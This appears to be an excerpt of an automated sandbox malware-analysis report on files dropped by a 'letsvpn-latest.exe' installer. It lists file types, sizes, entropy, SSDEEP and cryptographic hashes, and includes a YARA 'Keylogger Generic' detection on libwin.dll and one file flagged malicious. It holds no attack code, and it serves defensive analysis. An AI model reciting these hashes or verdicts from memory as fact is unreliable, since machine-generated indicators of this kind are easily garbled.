                                                                                                                                                                                                  MD5:359E96F1E3D4CF1B45357D9C02ACCEB9
                                                                                                                                                                                                  SHA1:B30FB5FB93B571E01F207AA954CCEA96253C4653
                                                                                                                                                                                                  SHA-256:75DC6A7021B4E412B98664D1C5017F458607B84C81D0BAA08B76F6F2005AFAC1
                                                                                                                                                                                                  SHA-512:A765E663ED6BED9C1EC8D59CAEA541F4C6AD3FE262A008FEADD5011D90E5D7E4B26F60F3E4A9BE7B8B68C420713103ADDCBE8D0930A10E8CF262ED4C5B656ED8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.906430383476696
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:q16eWLDWZhqWOHlLf2KQcvBZ95BS+ShjmM6IGBkS2h:G6Lyq3b2KZBZ9S+ST6nkRh
                                                                                                                                                                                                  MD5:4A8B84A7EF10B13E81857BFB02708FC3
                                                                                                                                                                                                  SHA1:0E63EBD59F13A628584F2DA2D0DB501B23EF97D2
                                                                                                                                                                                                  SHA-256:048643B783A173AEF2AC52005CB27DC9F70AD38ECF6FABD8C1868317692CDE2D
                                                                                                                                                                                                  SHA-512:077EA9B6229F2809630135C624EB9CF303D5546A78C6A98111D3E3B8023EBCF5C559F05DEC196BA70004C26BBA826E417007ED368FE6845758210E440224C9FB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18464
                                                                                                                                                                                                  Entropy (8bit):6.896763555557214
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:O8G4YC2W+wW8WpwW1hqWOHlLf2KQcvBZ9PlfS+ShjmM6IGBkSvacr:BGZ5lq3b2KZBZbS+ST6nkyaS
                                                                                                                                                                                                  MD5:BE61E3A1BB22AB977E7DE6538695BEAA
                                                                                                                                                                                                  SHA1:5B9059D915EDDAD58A1054660AAF0A5CC238D65A
                                                                                                                                                                                                  SHA-256:42891D1D8BC5F5A30DB038BAD254938E660D57FA9AC0CB29ACF46B1E3B77AE3E
                                                                                                                                                                                                  SHA-512:D77E08BD7D639DFCE63528C855CA08B456A7180CFCB62E7D90131F9A65DBD24FB70853F05674FAF64E03FB2DB414C7F095AD83054D9E13BAE5021F7CEC21DF89
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.998455717974313
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:H6ziqTEkGWvRWlhqWOHlLf2KQcvBZ9ypS+ShjmM6IGBkSN:HYT1Uq3b2KZBZqS+ST6nke
                                                                                                                                                                                                  MD5:4E6B8B111DEFA233D2371E499C205B11
                                                                                                                                                                                                  SHA1:83BA5DBBC30F3061DA4A5D8C48EB2600379DA7EF
                                                                                                                                                                                                  SHA-256:752FFB91E0F093EEDCC1FE30FDBDC8D638192D3ABD8A3593CA7E80DF5EACCD74
                                                                                                                                                                                                  SHA-512:1694C2E5C064F28D74CE3B4437F072FE856FD94C0FB2DBD5E5B084F3A50541A0B9C73B92EB8D0FB659019068B1E8D61B8907C537D4608EFD2F683087A8D862E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.914453258066552
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:PUv7c7iWNCWLhqWOHlLf2KQcvBZ91b/OS+ShjmM6IGBkSL:PM7c1Rq3b2KZBZ7OS+ST6nkg
                                                                                                                                                                                                  MD5:9D8D0EA2C78FD96A911BF3309BA106CA
                                                                                                                                                                                                  SHA1:77A5CF297E4A096E9D4D69397FD1CE740C983449
                                                                                                                                                                                                  SHA-256:1A1BCB4B7D3D9F6237BC0AD500F569C67A3814D752CAC05EA36D88DE364503F5
                                                                                                                                                                                                  SHA-512:1FC4B5A840C3550DCD9C164EC50229707B0C229573FFDE68B0C298F2F34D0F5567385FBA0C72BD062394F0E9B5B04D2DC2F75521B3FC14DD0A3D97F407428876
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.960387412382897
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:bSWnRWNhqWOHlLf2KQcvBZ9w+Z1DcS+ShjmM6IGBkSZ:bzIq3b2KZBZNcS+ST6nkC
                                                                                                                                                                                                  MD5:C696F5E811F8F558D1B6330C03E8CC14
                                                                                                                                                                                                  SHA1:E54559000EBDEC51C7162C528487DA60B5AD3FEB
                                                                                                                                                                                                  SHA-256:373D38EA5B8D8A8D55390BB9813A7A72BF5B930A77319E1CA52A70ADC85CE25A
                                                                                                                                                                                                  SHA-512:DA33E7E6C193CA5689AFB28539671F9CE3B3C97A1227F8C3526A6A731CD0C6FBD700C90AA0A2DCF2BFD8263BF56BCEFB92F9238F98DBF38FD1206CEE04A559AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101920
                                                                                                                                                                                                  Entropy (8bit):4.745461540655048
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:iHmt9tmMLbLR6330XUb9GYQtq3b2KZBZmS+ST6nkM:i+d6336UbIL43qK4/mG
                                                                                                                                                                                                  MD5:F23E3999FCDB4144DAC81D4808D2B897
                                                                                                                                                                                                  SHA1:B6055D4DBC6EA3C380787BE1D76332A033F5CFA4
                                                                                                                                                                                                  SHA-256:94537ED511AB56D787064EFCA837CC05FB99B2192F127C35668061E4CD69A09A
                                                                                                                                                                                                  SHA-512:F2F4FADE96296AE065814FE80AF8FBE521E73C8AFC6986DA2EEC9A0FC35DD8704C13052DA7204110FD2F89EC746562C5EB7E752D5B238AEE21864601A9DF9659
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):121376
                                                                                                                                                                                                  Entropy (8bit):5.089922899922607
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:or7hqeNzclb+af/wFGfdpOOJWOQE9/TBLW/Uwm0q3b2KZBZgS+ST6nk7:or7hqeNzclR/CWpKsRBLW/Ef3qKW/m9
                                                                                                                                                                                                  MD5:CA100065CAC383E78E4FAFC5610FA289
                                                                                                                                                                                                  SHA1:57AB1CF0E9FE01100DB886C2C639BE85CCA96679
                                                                                                                                                                                                  SHA-256:3F3E6F279A50164480B76A204969339069409AC164A1DCAA9329D552B92B288D
                                                                                                                                                                                                  SHA-512:E3C8ACE8EBCBA78335436451449F6CAD5895E82DEFD8C7B8AE26656C3A70AA2D76EA6AD81D3B816F00CC4D493B93DB7D943A43B504460A53EE3B3214FBD37C22
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):130080
                                                                                                                                                                                                  Entropy (8bit):5.9702765639204065
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:/Ax1gFvyQ1P7QozISTBCW1Nt+Gi/yOWi1/Xg6iyhUkuXlf/m:/EwJjRB5z2
                                                                                                                                                                                                  MD5:0E444739D07678A3F6EA4202C4237832
                                                                                                                                                                                                  SHA1:0689C9CDAD379B4B0952674A7BF75A5A1F2F33A9
                                                                                                                                                                                                  SHA-256:A3AAB8CA7B0747242207D1223E241E602B45BA69F25BA5B611A12EEACD19EC1A
                                                                                                                                                                                                  SHA-512:85F6D4920D93F8EE2BB7A384424C9EEA25CC5591BF7A7301BDC31170944549B3860A90C5694F194EE0F9CD85F0EA053E89039F95FF806B735E526D583EE7E0BF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PNG image data, 256 x 256, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12243
                                                                                                                                                                                                  Entropy (8bit):7.820583648387655
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:WLj1H8FzmdclL4jx3c4yrJuhRof6YQURyMGf0gDSvGrEHsf8Aw47b:QpiYccZrZRof6YQUPPgDSvGr+q8D47b
                                                                                                                                                                                                  MD5:AA3CFA4A176584F79EEE7F74032E446F
                                                                                                                                                                                                  SHA1:752B97FF9A8D28E92F6FB35EE24FF3DA2E8DEEE5
                                                                                                                                                                                                  SHA-256:34A9425F58EDB250E7FBD9217D73A5AD96D1986ACA3520AFE8CADB66E32E3F33
                                                                                                                                                                                                  SHA-512:A824DA84DEDAFCDCEACDF9D602B5F89526168E6350E7478D31A5562A8B12D496FB5205B62EDFB2DF1C3896D6B24DA761A1211CF342C1AFF8E6235C4569A54BFF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):73760
                                                                                                                                                                                                  Entropy (8bit):6.270537704846323
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:DXSaVnItYw1N0tUUTAz/kI5JIol/NkIgJ4Wj3qKK/mS:D5VnqzNaNE4IvIolSIgJjje/9
                                                                                                                                                                                                  MD5:A0442D522D6D577EB8727E1F1019413B
                                                                                                                                                                                                  SHA1:D39D4879650B86A7B9EEFD44418236432E84AAA3
                                                                                                                                                                                                  SHA-256:B4876C4E26053DDC8E3D198C20E2EB0A45D4B0A935AB7493CC7C5B41F93FAE67
                                                                                                                                                                                                  SHA-512:9C024876A876FE3B9F708EB9B3F6BAA3BBD3984542CD8F6DFFB16BEF693E40754371D5FA780EF204DDD09B37D2C1C0B68C18AB6D93CF969732F9CBD046A27CA9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54304
                                                                                                                                                                                                  Entropy (8bit):6.372264039844505
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:hDcl7W1UiZTo1ooEqzW3SQwiNsI8l5wwyvUPrYZBkcDTq3b2KZBZuS+ST6nkW:h8QpZTsooEX3SQwr9y4UZRDu3qKA/m0
                                                                                                                                                                                                  MD5:1CE428CFF43522A1AF4FACB23F71D608
                                                                                                                                                                                                  SHA1:C8F354FBDFB68B356CB4146A1EE945A2375FBAD5
                                                                                                                                                                                                  SHA-256:2956DDEB4C4D1284C52A099305DA39243888F9DAD5A15284C89A2D2238E07107
                                                                                                                                                                                                  SHA-512:06CFA947BB50B6E5A346ED6B390DEC8A0004B282A306B9F8F3CA69EF4587AAFEDC42536C12308BDFF57261F586C9481C7C3961188AAE4BE5C19C4CF7102CDDB7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) Aarch64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):127008
                                                                                                                                                                                                  Entropy (8bit):6.1002030171865975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:7DdMkQCUK86ryzDWs0MxThVvTe6sWkddGDGEtg3q2LOOCN+y3qKI/m2T:7Ddef+yR17exwDGEtg3q2LOdN+yU/lT
                                                                                                                                                                                                  MD5:549B6EC92306E2450F143AA585DF6DB2
                                                                                                                                                                                                  SHA1:E3AC456C76C4977E9C33A69DD649F13628C10686
                                                                                                                                                                                                  SHA-256:9C5602FEABC5C7C4D96551400282CAE11E740D87141476DCE5C7B5060EF5AEA0
                                                                                                                                                                                                  SHA-512:3ECA35112F57FC3DCDD25CD554A7E8F53F01DED73241027CD5C6C2EA57EE1B061C2D7DCE8B33716A615C2233B8C268712125FDFD0F800E42FCA8EE872495A04C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.786293052327813
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:JEZLkwA5qKV3XWe6lW1hqWOHlLf2KQcvBZ9YsTS+ShjmM6IGBkSS:yxkwAlaQq3b2KZBZtTS+ST6nkJ
                                                                                                                                                                                                  MD5:489C8B9F4E37E1D1FEF662341FC3F95A
                                                                                                                                                                                                  SHA1:3AE58E1054B8D994F1E2D26402BA285F16257116
                                                                                                                                                                                                  SHA-256:30290D2070FB124A2BD8DB48B11CFBEA21B0AFD5BDC28F3401FEDD8C3F9B66A8
                                                                                                                                                                                                  SHA-512:7D6C7A93ED7CE939DFF8BEBB5FD5F5687E8A877A7019ACEF0E4F2797001657561CB55B834BE9BCFE2DED8FA23F8CA5C8C96EFAD6EE71D1E6AB5800E82ACC529A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.788421298560347
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:4qmGsHW08We6lWMhqWOHlLf2KQcvBZ9DjqgS+ShjmM6IGBkSZRI:4BGsH1xHq3b2KZBZFlS+ST6nkGI
                                                                                                                                                                                                  MD5:D8C061C0526368E2A9D9B90BAE61E764
                                                                                                                                                                                                  SHA1:E83C1F781F339BC06A3FE0E27701869EE79B177C
                                                                                                                                                                                                  SHA-256:39D5F8E342DB9B9A694944D03099EB2C6CCAE1F926D829858D216985A54066F7
                                                                                                                                                                                                  SHA-512:D15944E01ADEFACCED782C9BA76851EE025A93AD6D5FE52392834A9D88AEDABBA39BE3B83B75A37C3D52B4DA67B83961237486300A9B8DC97605CAEACA055D3A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.754267815741174
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:611LpDt4We6lWHhqWOHlLf2KQcvBZ9AE9S+ShjmM6IGBkSZ:iBdqq3b2KZBZB9S+ST6nkK
                                                                                                                                                                                                  MD5:335DDC15C604733F3A3A74150F7EE386
                                                                                                                                                                                                  SHA1:017B875AD2AF40A2245DA464A34572509007D6CB
                                                                                                                                                                                                  SHA-256:514D89ED6AC01AE7B71A64C36B0A40FEC69973F5E0D4BB42DA8CF2DBA9278E0F
                                                                                                                                                                                                  SHA-512:208135523870EDC892F236B20C8C1B49E2922C888C6BC9403CC29F7BFF6A94FB41D69AFCD427A102E9016B032DC56424EFE4BC458974058ACF47398DA2BA939D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.791970793161073
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:LsxhehdMDxbFWe6lW5hqWOHlLf2KQcvBZ9XKiNS+ShjmM6IGBkS4:4vy+DA4q3b2KZBZbS+ST6nkr
                                                                                                                                                                                                  MD5:63C242659089C61B00298F898CED5B2E
                                                                                                                                                                                                  SHA1:97104D6BAC9B264B9CEE15F2C4B82ABE80872192
                                                                                                                                                                                                  SHA-256:706ECAC3AB9529F2AA8782D9CDAC358225436850685F98FEA7B557A89941A86B
                                                                                                                                                                                                  SHA-512:A0E5D459839FD79E0E2CC58EB1B956D931503710DE3E0A733F6DD5E29787CFE9D6562FEB49421C220E0F5C013F028B9E88C61FBD837D91799B7C98992942E51E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.755805881100906
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:79WLKzFWe6lWUhqWOHlLf2KQcvBZ9lhbS+ShjmM6IGBkS8b:5gKz+rq3b2KZBZ1bS+ST6nkfb
                                                                                                                                                                                                  MD5:4E8BBD3CFDFF50E0E2A8F1CF7D7C0B1B
                                                                                                                                                                                                  SHA1:6C9BEEA42873A8367AA26CA6151176EEFFB69331
                                                                                                                                                                                                  SHA-256:850A6C7B1D216178671F60C56295CECE8B801F3801CD2670C0193E29DC9ED91B
                                                                                                                                                                                                  SHA-512:7D0722A6CBEA607B56C0FE5D11A31EC44314F3A694D1E45811C02EEF96D7151B700D202F39DD3DEE80BF4C2118AA8892F1464FAC74469855E70C34111E2BC7A4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22048
                                                                                                                                                                                                  Entropy (8bit):6.900258148465496
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rNeZmFLRnyGO00Ik4oF3eUntWe6lWdhqWOHlLf2KQcvBZ9bxJS+ShjmM6IGBkS8:rQZmFLRnyGO00Ik4oF3eUnGYq3b2KZB+
                                                                                                                                                                                                  MD5:1CE86E199C50E28E4423BCDEC3B337C5
                                                                                                                                                                                                  SHA1:8EF284E87F8D9C1C0B78F826DBC42A381D753C73
                                                                                                                                                                                                  SHA-256:52D25AE7CF6ECC8746DDCFF279766A59162EE1A8D25FD7424E7A27E76EA9E7CA
                                                                                                                                                                                                  SHA-512:731C04BA44CEE917C3A255AD534C325D1511A1151CA4C304E18666AD28EA650A3A280A257E3E2C865D0F12A97AB5246500B8F97ED51E4A1A9121DDAEF38E9C94
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.9205398032930345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:xPP73AIGoWe6lWYhqWOHlLf2KQcvBZ9c2MS+ShjmM6IGBkSl:xX7AIGNTq3b2KZBZ9MS+ST6nkC
                                                                                                                                                                                                  MD5:B54150F34E9E5ED23D69BD822937A52B
                                                                                                                                                                                                  SHA1:E2FF594B6D9BE3A90725B1BA169A9027ECA33ABC
                                                                                                                                                                                                  SHA-256:3E866F4F1F18EF5CF7C9F6E4BBEF74ACD69120004A52778A8FD7CFC6E14066A4
                                                                                                                                                                                                  SHA-512:CED65F0CAED6DE841339140294D707FF49BA89199B7891A95A5CE7047F5203CAF570EF5831533C94073D3A190321B6BAB4A4085A1923F218843D674E8F147FC9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10689056
                                                                                                                                                                                                  Entropy (8bit):6.3491186908804655
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:GDzluVRWdkyvuIeBGrez6CYG7m68SxIc6b0tTziC002MZ:Mzln6aM1oC0JMZ
                                                                                                                                                                                                  MD5:ADABDAFF05BC4BA3CADF3A8F7248617F
                                                                                                                                                                                                  SHA1:0EEA8F9BE4CDF3D3933A35A2F2620C1E2AC57F4F
                                                                                                                                                                                                  SHA-256:75408CEC6E96255CDFA76163A26887E3DB726413CA5DF27A7331286282BB8450
                                                                                                                                                                                                  SHA-512:D792B6CBE8E29DC50FBC126C23535463E7F6E766DD7E9F5C6A63D476F7939DE8FC41EA17F8119858954638A591819F114794B6B26DBF240E408357A0D5D260B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll, Author: Joe Security
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1510
                                                                                                                                                                                                  Entropy (8bit):5.153642637730153
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:JdGw/e40s+FpMU+nHnUn+OtxXqY9JXMi7c+nHQ7qY/DJYLLYi:3Gw/x0s6peHhOtRPJX3rHSF6Lsi
                                                                                                                                                                                                  MD5:7A7521BC7F838610905CE0286324CE39
                                                                                                                                                                                                  SHA1:8AB90DD0C4B6EDB79A6AF2233340D0F59E9AC195
                                                                                                                                                                                                  SHA-256:2A322178557C88CC3C608101E8FC84BFD2F8FA9B81483A443BB3D09779DE218D
                                                                                                                                                                                                  SHA-512:B25DFDCE0977EAF7159DF5EABE4B147A6C0ADAC39C84D1C7A9FE748446A10C8D2E20D04CF36221057AA210633DF65F2A460821C8C79A2DB16C912EC53A714D83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<log4net>....<logger name="logger">.....<level value="ALL" />.....<appender-ref ref="LogAppender" />....</logger>....<appender name="LogAppender" type="log4net.Appender.RollingFileAppender">.....<param name="File" value="Log\\" />.....<param name="AppendToFile" value="true" />.....<param name="MaxFileSize" value="10240" />.....<param name="MaxSizeRollBackups" value="100" />.....<param name="StaticLogFileName" value="false" />.....<param name="DatePattern" value="yyyyMMdd&quot;.log&quot;" />.....<param name="RollingStyle" value="Date" />.....<layout type="log4net.Layout.PatternLayout">......<param name="ConversionPattern" value="%d [Level: %-5p] [Thread: %t] [class.%c] [%x]: %m%n" />.....</layout>....</appender>....<appender name="TextAppender" type="log4net.Appender.RollingFileAppender">.....<param name="AppendToFile" value="true" />.....<param name="RollingStyle" value="Date" />.....<param name="DatePattern" value="&quot;
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):282144
                                                                                                                                                                                                  Entropy (8bit):5.7076450783689925
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:CG0WgexKpGi8PnJcerXUaxX3HVeES4BEIqTTpX/4ormGpnaVTSGCkMhkEn7GAhCT:CJrycoB3HVeESME3pnaVTS1nh7hCa9A
                                                                                                                                                                                                  MD5:C5098FF401B766E6E554499D37D0B716
                                                                                                                                                                                                  SHA1:FD4C3DF050EC2B30740E2D62B27A9E375401F190
                                                                                                                                                                                                  SHA-256:B015C62C09B4033D0A4CAAE36F3A9804A8CEE2549145E199ADA5A9BF51095E0D
                                                                                                                                                                                                  SHA-512:04F3261ED8D59E5E8455D868CB7CEEF97466FB4FC57A98544024F53C4BA9D935E9441169F0705877CF3578F2EF4FC1B54921E9E15ECC70003C67452AE1393F01
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1109536
                                                                                                                                                                                                  Entropy (8bit):5.833531644079543
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:c1WtBetKEfrsial0WV1pqfy+Jp15yKn6Gg:vtBetKEfrsial0WV7215yKn6Gg
                                                                                                                                                                                                  MD5:9D0ED298898601B4BCE156C4B550FBAF
                                                                                                                                                                                                  SHA1:909623F8AE5CEA4527DC4E2C5D1D851F65702148
                                                                                                                                                                                                  SHA-256:491BD0614EBD705E0F7E1E085D30F201F4CD7AD2F886048BD597BFB46449A87C
                                                                                                                                                                                                  SHA-512:07D3B077AB08074EF9E5552180B73521C8E4FAD48A9AAAEED26BE9D1F0F7C8C88CEF211BD65DFF2FB9F8EE0093E40DEF34F6F714EBA562DF41FEB430D5E6B16F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):94240
                                                                                                                                                                                                  Entropy (8bit):5.545893753117987
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:h2Ec05j4eAH64rh5fSt5T9nFcI94W83qKv/m+:wlK4eA7mDmW8j/N
                                                                                                                                                                                                  MD5:85898D7A2C1B25CDE3CCB2001B4AFAE4
                                                                                                                                                                                                  SHA1:232A32AED8550D07B36528053A59FD0F7E28C578
                                                                                                                                                                                                  SHA-256:DEB3D361EF42CAC93F602C17B7F3DF6E22CE79D10C111CDD7969BCCC3FDE5B40
                                                                                                                                                                                                  SHA-512:F697C0F5CFA384AC23EFDE1E0F5A2597E1415E3322B3C35983BA8A9A64CE016A241F1834CDC269CE41AB772E9FA227963BE388A6387F8056C451D8F5CF5A4E54
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
